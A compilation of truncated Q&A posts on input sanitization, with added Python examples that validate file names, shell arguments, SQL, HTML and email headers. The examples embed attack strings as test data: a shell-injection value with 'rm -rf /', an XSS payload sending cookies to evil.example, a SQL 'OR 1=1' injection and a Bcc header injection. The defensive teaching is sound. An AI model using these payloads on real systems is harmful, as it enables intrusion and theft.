I have a string that I want to use as a filename, so I want to remove all characters that wouldn't be allowed in filenames, using Python.
I'd rather be strict than otherwise, so let's say I want to retain only letters, digits, and a small set of other characters like "_-.() ". What's the most elegant solution?
The filename needs to be ...
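One way to do the strict allow-list the question asks for, written as an added example and not code from the original post. It keeps only ASCII letters, digits and the set "_-.() ", and it also handles the cases a file-name sanitizer is usually caught by: accented letters (folded to ASCII via NFKD rather than silently dropped), names that collapse to nothing, leading dots and spaces, Windows reserved device names, and length. The 255-character limit and the "file" fallback are assumptions chosen for the example.

```python
import re
import unicodedata

# Allow-list from the question: ASCII letters, digits and "_-.() ". Anything else is removed.
_DISALLOWED = re.compile(r"[^A-Za-z0-9_\-.() ]")

# Device names Windows refuses as file names regardless of extension.
_WINDOWS_RESERVED = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def safe_filename(name: str, max_len: int = 255, fallback: str = "file") -> str:
    """Return a strict, portable file name derived from *name*.

    max_len and fallback are example defaults, not values from the question.
    """
    # NFKD splits "\u00e9" into "e" + a combining accent; the accent is then
    # removed by the allow-list, so "Caf\u00e9" becomes "Cafe" instead of "Caf".
    name = unicodedata.normalize("NFKD", name)
    name = _DISALLOWED.sub("", name)
    # Collapse runs of whitespace, then strip leading/trailing spaces and dots:
    # no hidden files, no path-traversal residue ("../" becomes ""), and no
    # trailing dot, which Windows silently drops.
    name = re.sub(r"\s+", " ", name).strip(" .")
    if not name:
        return fallback
    # Windows checks the stem (part before the first dot), case-insensitively.
    stem = name.split(".", 1)[0]
    if stem.upper() in _WINDOWS_RESERVED:
        name = "_" + name
    return name[:max_len]


if __name__ == "__main__":
    for raw in ["../../etc/passwd", "Caf\u00e9 Noir: Live (2004).mp3", "con.txt", "???", "  .hidden  "]:
        print(repr(raw), "->", repr(safe_filename(raw)))
```

Because slashes are never in the allow-list, the result can only ever name a file inside the directory you join it to; the truncation is a simple slice, so a very long name may lose its extension.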
I recently have been moving a bunch of MP3s from various locations into a repository. I had been constructing the new file names using the ID3 tags (thanks, TagLib-Sharp!), and I noticed that I was getting a System.NotSupportedException: "The given path's format is not supported." This was generated by either File.Copy() or Directory.Cre...
I am inserting some text scraped from the web into my database. Some of the fields in the string have unprintable/weird characters. For example,
if text is "C__O__?__P__L__E__T__E",
then the text in the database is stored only as "C__O__"
I know about h(), strip_tags()... sanitize, ... etc etc. But I do not want to sanitize this SQL. Th...
I'm looking for a way to sanitize input that I paste into the browser, is this possible to do with jQuery?
I've managed to come up with this so far:
$(this).live(pasteEventName, function(e) {
// this is where i would like to sanitize my input
return false;
});
Unfortunately my development has come to a screeching halt because of this...
To clarify, I want to check for valid characters. For first name, last name I want to check for [A-Za-z]. For Email I want to check for chars valid for email.
What algorithm would I use to CHECK user input? Specifically, I'd like to CHECK the user's first name, last name and email address for valid characters before I add to database.
...
This feels like it should be an easy one, but I'm having trouble cleaning out the newline character in content pasted from Microsoft Word. Not a full line-break, but the CTRL ENTER character that shows up as a return arrow in Word. I've tried chr(10), chr(13), \u000D, \u000A and a few others, but I can't match it in a string.replace(). S...
I have this code:
$query = "select id from votes where username = '$user' and article_id = $this->id";
I tried this code to sanitize it:
$query = sprintf("select id from votes where username = '$user' and article_id = $this->id",
mysql_real_escape_string($user),
mysql_real_escape_string($password));
but I get this error ...
I'm coding a web interface to a horrible piece of proprietary software our company uses. The software has no real UI and requires us to give PuTTY access to our system for our clients to even pull data. My web interface has to run an exec() function and it has to pass a few variables the user inputs.
$command = "report-call '$type' '$s...
I would like to interface a PHP page to the Linux command-line program ping.
I realize that there are sanitization issues. Is there a built-in library or function that can take care of everything, or will I have to rely on regex parsers?
...
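The two exec()/ping questions above have the same fix: never let user input become part of a shell command line. The added example below (not code from either post) shows the approach in Python. The target is validated against an IP address or an RFC 1123 style hostname (the hostname regex is an assumption for the example), and the program is launched with an argv list and no shell, so metacharacters have nothing to inject into; shlex.quote is shown as the equivalent of PHP's escapeshellarg for the rare case where a shell string is unavoidable.

```python
import ipaddress
import re
import shlex
import subprocess
from typing import List

# Hostname rule assumed for this example: RFC 1123 labels (1-63 chars, no leading or
# trailing hyphen), joined by dots, 253 chars overall. Leading "-" is rejected by the
# lookahead, so input can never be read by ping as an option.
_HOSTNAME = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def validate_target(target: str) -> str:
    """Return *target* if it is an IP address or a plausible hostname; raise ValueError otherwise."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME.fullmatch(target):
        return target
    raise ValueError(f"invalid target: {target!r}")


def build_ping_argv(target: str, count: int = 3) -> List[str]:
    """Argv for ping. Each element is passed to the program as-is; no shell parses it."""
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    return ["ping", "-c", str(count), validate_target(target)]


def run_ping(target: str, count: int = 3, timeout: float = 15) -> str:
    """Run ping without a shell (shell=False is the default) and return its stdout."""
    result = subprocess.run(
        build_ping_argv(target, count), capture_output=True, text=True, timeout=timeout
    )
    return result.stdout


def shell_for_display(argv: List[str]) -> str:
    """If a shell string is truly needed, quote every argument (like PHP's escapeshellarg)."""
    return " ".join(shlex.quote(a) for a in argv)


if __name__ == "__main__":
    # Vulnerable pattern from the questions, for contrast: "ping -c 3 $target" through a shell,
    # where a target of "8.8.8.8; rm -rf /" runs a second command.
    for candidate in ["8.8.8.8", "example.com", "8.8.8.8; rm -rf /", "$(id)", "-h"]:
        try:
            print(shell_for_display(build_ping_argv(candidate)))
        except ValueError as exc:
            print("rejected:", exc)
```

The validation is the real control here; the argv list only guarantees that whatever gets through cannot spawn a second command, so a value like "-h" still has to be refused explicitly.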
Hello
When outputting user input I use this function:
function bbkoda($text) {
$text = htmlspecialchars($text);
$text = nl2br($text);
$hitta = array(
"'\[b](.*?)\[/b]'is",
"'\[i](.*?)\[/i]'is"
);
$byt = array(
"<b>\\1</b>",
"<i>\\1</i>"
);
$text = preg_replace($hitt...
Is it a dangerous thing to view an access log via a web browser without sanitizing it?
I am considering recording an access log, and I am considering viewing it via a web browser, but if an attacker modifies his remote host or user agent or something, can he attack me by inserting attack code into his remote host or user agent, etc.?
So do I ne...
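Yes: the user agent, referer and even the reverse-DNS host name are attacker-controlled strings, and a log viewer that writes them into HTML unescaped is a stored XSS sink. The added example below (not code from the post) parses a constructed combined-log-format line whose referer and user agent carry script, and renders a table while HTML-escaping every field at output time. The sample line is made up for the example; real log lines may also contain escaped quotes that this simple regex does not handle.

```python
import html
import re

# Constructed log line: the referer and user-agent fields carry HTML/JS payloads.
SAMPLE_LOG = (
    '203.0.113.5 - - [10/Oct/2000:13:55:36 -0700] "GET /index.html HTTP/1.0" 200 2326 '
    '"http://evil.example/<img src=x onerror=alert(1)>" '
    '"<script>document.location=\'http://evil.example/?c=\'+document.cookie</script>"'
)

# Combined log format (simplified: quoted fields are assumed not to contain quotes).
_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_line(line: str) -> dict:
    """Split one log line into named fields; raise on lines that do not match."""
    m = _LINE.match(line)
    if not m:
        raise ValueError("unrecognised log line")
    return m.groupdict()


def render_row(fields: dict) -> str:
    """Escape every field exactly once, at output time. quote=True also encodes ' and ",
    so the same escaped value is safe inside an attribute as well as in text."""
    cells = "".join(f"<td>{html.escape(value, quote=True)}</td>" for value in fields.values())
    return f"<tr>{cells}</tr>"


def render_table(lines) -> str:
    rows = "\n".join(render_row(parse_line(line)) for line in lines)
    return f"<table>\n{rows}\n</table>"


def has_raw_markup(rendered: str) -> bool:
    """Self-check: after removing the table tags we emitted, no '<' or '>' may remain."""
    stripped = re.sub(r"</?(?:table|tr|td)>", "", rendered)
    return "<" in stripped or ">" in stripped


if __name__ == "__main__":
    print(render_table([SAMPLE_LOG]))
```

Store the log exactly as received and escape when you display it; escaping on the way in would corrupt the evidence and still leave any other consumer of the log unprotected.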
I have a simple PHP mailer script that takes values from a form submitted via POST and mails them to me:
<?php
$to = "[email protected]";
$name = $_POST['name'];
$message = $_POST['message'];
$email = $_POST['email'];
$body = "Person $name submitted a message: $message";
$subject = "A message has been submitted";
$headers = 'From: ' ....
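The mailer above puts $_POST['email'] straight into a From: header, and the earlier question about checking first name, last name and email for valid characters is really the same problem. The added example below (not code from either post) applies the question's own [A-Za-z] rule for names and a simplified email pattern (an assumption; it is not a full RFC 5322 parser), and, separately from format validation, refuses any CR, LF or NUL in a header value, because a newline lets the submitter append headers such as Bcc:. It also shows why a regex anchored with $ is not enough: in Python, $ matches before a trailing newline.

```python
import re


class HeaderInjection(ValueError):
    pass


# Simplified address syntax, assumed for this example.
_EMAIL = re.compile(r"[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}")
# Same pattern anchored with ^ and $, kept only to demonstrate the trap below.
_EMAIL_DOLLAR = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}$")
# The question's own rule for first and last name.
_NAME = re.compile(r"[A-Za-z]+")


def naive_is_email(value: str) -> bool:
    """re.match with a $-anchored pattern: accepts "a@b.com\\n" because $ matches before a final newline."""
    return bool(_EMAIL_DOLLAR.match(value))


def is_email(value: str) -> bool:
    """fullmatch requires the whole string to match, so a trailing newline fails."""
    return bool(_EMAIL.fullmatch(value))


def validate_email(value: str) -> str:
    if not is_email(value):
        raise ValueError(f"invalid email: {value!r}")
    return value


def validate_name(value: str) -> str:
    if not _NAME.fullmatch(value):
        raise ValueError(f"invalid name: {value!r}")
    return value


def safe_header_value(value: str) -> str:
    """Reject line breaks and NUL regardless of what else validation allowed."""
    if re.search(r"[\r\n\x00]", value):
        raise HeaderInjection(f"header injection attempt: {value!r}")
    return value


def build_message(name: str, email: str, message: str, to: str = "you@example.com") -> str:
    """Assemble the raw message the PHP script builds; 'to' is a placeholder address."""
    headers = [
        ("To", safe_header_value(to)),
        ("From", safe_header_value(validate_email(email))),
        ("Subject", safe_header_value("A message has been submitted")),
    ]
    head = "\r\n".join(f"{k}: {v}" for k, v in headers)
    body = f"Person {validate_name(name)} submitted a message: {message}"
    return head + "\r\n\r\n" + body


if __name__ == "__main__":
    print(build_message("Alice", "alice@example.com", "hello"))
    for bad in ["attacker@example.com\r\nBcc: victim@example.com", "alice@example.com\n"]:
        try:
            build_message("Alice", bad, "x")
        except ValueError as exc:
            print("rejected:", exc)
```

The message body is the one place where newlines are legitimate, which is why the CR/LF check is applied per header value rather than to the whole input; note also that the [A-Za-z] name rule from the question rejects real names such as O'Brien, so treat it as the question's policy rather than a general one.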
Hi,
I am working on a directions service where users enter the from and to addresses and get the directions table (that gives turn-by-turn information) along with a map showing the route.
Below is the complete source code (getdirections.php):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtm...
I need to create a simple search but I can't afford to use Sphinx.
Here's what I wrote:
keywords = input.split(/\s+/)
queries = []
keywords.each do |keyword|
queries << sanitize_sql_for_conditions(
"(classifications.species LIKE '%#{keyword}%' OR
classifications.family LIKE '%#{keyword}%' OR
...
Hi there,
I'm looking for advice on how to clean submitted HTML in a web app so it can be redisplayed in future without styles or unclosed tags wrecking the layout of an app.
On my app rich HTML is submitted by users with YUI Rich text editor, which by default runs a few regexps to clean the input, and I'm also calling the [filter_M...
I'm working on a Rails application and I would like to know what's the best way to strip blocks of CSS or JavaScript.
<style>
...
</style>
-or-
<script>
...
</script>
I'm using the *strip_tags* helper to take care of most of the HTML, but it leaves a bunch of CSS when the content contains inline CSS. Thanks
...
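strip_tags-style helpers remove the tags but keep the text between them, which is exactly why inline CSS and script bodies survive. The added example below (not code from the Rails post or the YUI post above it) uses Python's standard html.parser to drop script and style elements together with their contents, and then escapes the remaining text before it is put back into a page, which the rich-text question also needs. The sample HTML is constructed for the example.

```python
import html
from html.parser import HTMLParser


class TextExtractor(HTMLParser):
    """Collect text content, skipping <script> and <style> and everything inside them.

    html.parser treats script and style as raw-text elements, so their bodies arrive
    in handle_data unparsed; a depth counter suppresses them until the matching end tag.
    """

    SKIP = {"script", "style"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self._skip_depth = 0
        self._chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self._chunks.append(data)

    def text(self) -> str:
        return "".join(self._chunks)


def strip_tags(html_src: str) -> str:
    """Plain text of *html_src* with script/style blocks removed entirely."""
    parser = TextExtractor()
    parser.feed(html_src)
    parser.close()
    return parser.text()


def safe_snippet(html_src: str) -> str:
    """Text that can be inserted into a page: convert_charrefs turned "&lt;b&gt;" back into
    a literal "<b>", so the result must be escaped again before it is rendered."""
    return html.escape(strip_tags(html_src))


if __name__ == "__main__":
    SAMPLE = (
        "<div><style>p{color:red}</style><p>Hello <b>world</b></p>"
        "<script>alert(1)</script></div>"
    )
    print(repr(strip_tags(SAMPLE)))
```

This produces text, not sanitized HTML; if the goal is to keep some markup (as in the rich-text question), a whitelist-based HTML sanitizer is the right tool and the escape step here is what prevents stripped text from re-introducing tags.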
This question is based on this thread.
Do you need the explicit sanitizing when you use pg_prepare?
I feel that pg_prepare sanitizes the user's input automatically such that we do not need this
$question_id = filter_input(INPUT_GET, 'questions', FILTER_SANITIZE_NUMBER_INT);
Context where I use Postgres
$result = pg_prepare($dbco...
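Three of the questions above are the same point seen from PHP, Ruby and Postgres: the sprintf attempt that still interpolates $user into the format string, the Rails LIKE search, and whether pg_prepare makes extra sanitizing unnecessary. The added example below (not code from any of the posts) uses Python's built-in sqlite3 so it runs offline. It shows the interpolated query leaking every row, the same query with bound parameters returning nothing for the attack string, integer inputs validated by type rather than by escaping, and the separate LIKE concern: neither escaping functions nor parameter binding treat % and _ specially, so a wildcard search needs its own escaping plus an ESCAPE clause. Table contents are constructed for the example.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed rows matching the questions' table names."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE votes (id INTEGER PRIMARY KEY, username TEXT, article_id INTEGER);
        INSERT INTO votes (username, article_id) VALUES ('alice', 7), ('bob', 7), ('alice', 8);
        CREATE TABLE classifications (id INTEGER PRIMARY KEY, species TEXT, family TEXT);
        INSERT INTO classifications (species, family) VALUES
            ('Felis catus', 'Felidae'), ('Canis lupus', 'Canidae'), ('100% wild cat', 'Felidae');
        """
    )
    return conn


def vote_ids_interpolated(conn, user: str, article_id) -> List[int]:
    """The questions' pattern: values pasted into the SQL text. Kept only for contrast."""
    sql = f"select id from votes where username = '{user}' and article_id = {article_id} order by id"
    return [row[0] for row in conn.execute(sql)]


def vote_ids_param(conn, user: str, article_id) -> List[int]:
    """Bound parameters: the driver sends values separately, so quotes in *user* are data.
    int() does for article_id what FILTER_SANITIZE_NUMBER_INT is used for: type validation."""
    sql = "select id from votes where username = ? and article_id = ? order by id"
    return [row[0] for row in conn.execute(sql, (user, int(article_id)))]


def escape_like(term: str, esc: str = "\\") -> str:
    """Make % and _ literal inside a LIKE pattern; the escape char itself is doubled first."""
    return term.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def search_ids(conn, keywords_input: str, escape: bool = True) -> List[int]:
    """Keyword search like the Rails snippet: every keyword must match species or family."""
    clauses, params = [], []
    for keyword in keywords_input.split():
        pattern = "%" + (escape_like(keyword) if escape else keyword) + "%"
        clauses.append("(species LIKE ? ESCAPE '\\' OR family LIKE ? ESCAPE '\\')")
        params += [pattern, pattern]
    sql = "select id from classifications"
    if clauses:
        sql += " where " + " AND ".join(clauses)
    return [row[0] for row in conn.execute(sql + " order by id", params)]


if __name__ == "__main__":
    db = make_db()
    attack = "' OR 1=1 --"
    print("interpolated:", vote_ids_interpolated(db, attack, 7))  # every vote in the table
    print("parameterised:", vote_ids_param(db, attack, 7))        # no such user: []
    print("unescaped LIKE '_at':", search_ids(db, "_at", escape=False))
    print("escaped LIKE '_at':", search_ids(db, "_at"))
```

So for the pg_prepare question: once a value travels as a parameter it cannot change the statement, and filter_input is left with its real job, rejecting values of the wrong type. In SQLite, LIKE is case-insensitive for ASCII, which is why the search for "felidae" matches the mixed-case rows.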
As I prepare to tackle the issue of input data filtering and sanitization, I'm curious whether there's a best (or most used) practice? Is it better to filter/sanitize the data (of HTML, JavaScript, etc.) before inserting the data into the database, or should it be done when the data is being prepared for display in HTML?
A few notes:
...
I am working on finding a good way to make user-submitted data, in this case allowing HTML, as safe and fast as I can.
I know EVERY SINGLE PERSON on this site seems to think http://htmlpurifier.org is the answer here. I do agree partially. htmlpurifier has the best open source code out there for filtering user submitted H...
I have coded the following function. But surely someone has a more elegant way to perform this task.
/**
*
* HTML 4 Specification
* ID and NAME tokens must begin with a letter ([A-Za-z]) and may be followed by any number
* of letters, digits ([0-9]), hyphens ("-"), underscores ("_"), colons (":"), and periods (".").
* @param s
* @re...
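The HTML 4 rule quoted in the docblock is a small enough grammar that one regex both validates it and, with a fallback prefix, coerces arbitrary text into a valid token. The added example below is not the function from the post; the "id-" prefix and the hyphen used as replacement character are choices made for the example.

```python
import re

# HTML 4 ID/NAME token: a letter, then letters, digits, "-", "_", ":" and ".".
_ID_TOKEN = re.compile(r"[A-Za-z][A-Za-z0-9\-_:.]*")
# Anything outside the token alphabet (used when coercing, so it is not anchored).
_DISALLOWED = re.compile(r"[^A-Za-z0-9\-_:.]")


def is_valid_id(value: str) -> bool:
    """True if *value* is a well-formed HTML 4 ID/NAME token."""
    return bool(_ID_TOKEN.fullmatch(value))


def to_valid_id(value: str, prefix: str = "id-") -> str:
    """Coerce arbitrary text into a valid token.

    Disallowed characters become "-", runs of "-" collapse, leading/trailing "-" are
    dropped, and the prefix (an example choice) is added when the result does not start
    with a letter, including when nothing survives at all.
    """
    token = _DISALLOWED.sub("-", value.strip())
    token = re.sub(r"-{2,}", "-", token).strip("-")
    if not re.match(r"[A-Za-z]", token):
        token = prefix + token
    return token


if __name__ == "__main__":
    for raw in ["a:b.c-d_e", "1abc", "123 main street!", "Section 2.1: Intro", "???"]:
        print(repr(raw), is_valid_id(raw), "->", repr(to_valid_id(raw)))
```

Colons and periods are legal in the token but have meaning in CSS selectors, so an id such as "Section-2.1:-Intro" must be escaped before it is used in a selector; restrict the alphabet further if the ids will be targeted from stylesheets.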